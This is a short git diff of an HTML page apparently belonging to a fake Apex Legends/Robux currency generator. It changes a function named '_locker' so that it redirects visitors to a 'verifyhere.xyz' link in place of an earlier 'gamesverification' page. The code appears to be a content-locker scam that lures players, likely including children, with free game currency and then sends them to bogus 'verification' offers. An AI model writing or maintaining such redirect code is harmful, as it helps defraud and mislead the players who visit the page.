--- a/11apexlegends/index.html
+++ b/11apexlegends/index.html
@@ -764,8 +764,8 @@ document.getElementById("Robux-Card3").classList.add('Robux-Card');
 }
 function _locker(){
     // window.location="https://youtube.com";
-    window.location="https://glitchandgrind.wixsite.com/gamesverification";
-    // window.location="https://verifyuser.org/cl/i/6dxw9m";
+	    window.location="https://verifyhere.xyz/cl/i/6dxw9m";
+
 }
 
 function generate(){
